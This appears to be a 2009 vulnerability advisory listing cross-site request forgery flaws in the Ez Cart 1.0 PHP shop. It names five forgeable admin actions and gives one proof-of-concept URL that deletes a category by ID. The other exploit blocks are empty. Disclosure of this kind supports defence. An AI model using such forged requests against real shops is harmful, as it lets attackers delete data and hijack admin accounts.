[#-----------------------------------------------------------------------------------------------#] [#] Title: Ez Cart Multiple XSRF Vulnerabilities [#] Author: Milos Zivanovic [#] Email: milosz.security[at]gmail.com [#] Date: 15. December 2009. [#-----------------------------------------------------------------------------------------------#] [#] Application: Ez Cart [#] Version: 1.0 [#] Platform: PHP [#] Link: http://www.scriptsez.net/?action=details&cat=Content%20Management&id=2472658093 [#] Price: 25 USD [#] Vulnerability: Multiple XSRF Vulnerabilities [#-----------------------------------------------------------------------------------------------#] [#]Content |--Remove item by id |--Remove member by id (not tested) |--Remove category by id |--Change admin info |--Send emails to all members [+]Remove item by id [EXPLOIT------------------------------------------------------------------------------------------]
[EXPLOIT------------------------------------------------------------------------------------------] [+]Remove member by id (not tested) [EXPLOIT------------------------------------------------------------------------------------------]
[EXPLOIT------------------------------------------------------------------------------------------] [+]Remove category by id [POC----------------------------------------------------------------------------------------------] http://localhost/ezcart_demo/admin.php?action=categories&do=delete&op=[ID] [POC----------------------------------------------------------------------------------------------] [*]Change admin info [EXPLOIT------------------------------------------------------------------------------------------]
[EXPLOIT------------------------------------------------------------------------------------------] [+]Send emails to all members [EXPLOIT------------------------------------------------------------------------------------------]
[EXPLOIT------------------------------------------------------------------------------------------] [#]EOF